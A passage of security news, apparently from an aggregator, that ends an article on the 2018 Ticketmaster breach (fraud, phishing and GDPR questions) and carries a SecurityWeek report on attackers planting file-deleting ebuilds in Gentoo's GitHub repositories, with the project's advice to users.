The danger to victims of this breach is primarily twofold: fraudulent use of the stolen payment details, and more calculated identity theft. "The fact that payment card information has been caught up in this breach is hugely concerning," comments Brooks Wallace, Head of EMEA for Trusted Knight. "In cases like this, details often end up for sale on the dark web, rather than in the hands of the original hackers themselves, and then end up being used for fraudulent transactions and in some cases identity theft.

"When used to make transactions, fraudsters often start by testing small transactions here to make sure it works and then ramp up to bigger purchases. Anyone who thinks they may have been caught up in this breach needs to keep a very careful eye on their bank accounts and potentially should contact their bank to change their cards." In reality, any customer of Ticketmaster, whether a victim of this breach or not, will need to be wary of the inevitable opportunistic phishing emails that follow any such breach.

One aspect of this breach will only become clear over time: how will the European data protection regulators react in relation to the General Data Protection Regulation. It's a moot point since the actual breach occurred prior to the activation of GDPR, although internal recognition and victim notification both occurred within GDPR. The UK's ICO will probably treat the case similar to the Dixons Carphone breach: "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 2018 Data Protection Acts."


Hackers Plant Malicious Code on Gentoo Linux GitHub Page
29.6.2018 securityweek 
Virus

Gentoo Linux GitHub account hacked

Developers of the Gentoo Linux distribution warned users on Thursday that one of the organization’s GitHub accounts was compromised and that malicious code had been planted by the attackers.

“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there. We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,” Gentoo said on its website.

According to Gentoo developer Francisco Blas Izquierdo Riera, the attacker replaced the portage and musl-dev trees with malicious ebuilds designed to remove all files from a system. However, the developer says the code doesn’t actually work as intended in its current form.

Ebuilds are bash scripts used by Gentoo Linux for its Portage software management system.

Gentoo pointed out that code hosted on its own infrastructure is not impacted and the Gentoo repository mirrors are hosted in a separate GitHub account that does not appear to be affected by the breach.

“Since the master Gentoo ebuild repository is hosted on our own infrastructure and since Github is only a mirror for it, you are fine as long as you are using rsync or webrsync from gentoo.org,” users have been told.

Gentoo users have been advised not to utilize any ebuilds obtained from the compromised GitHub account prior to 18:00 GMT on June 28, 2018. GitHub has suspended the hacked account.

“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.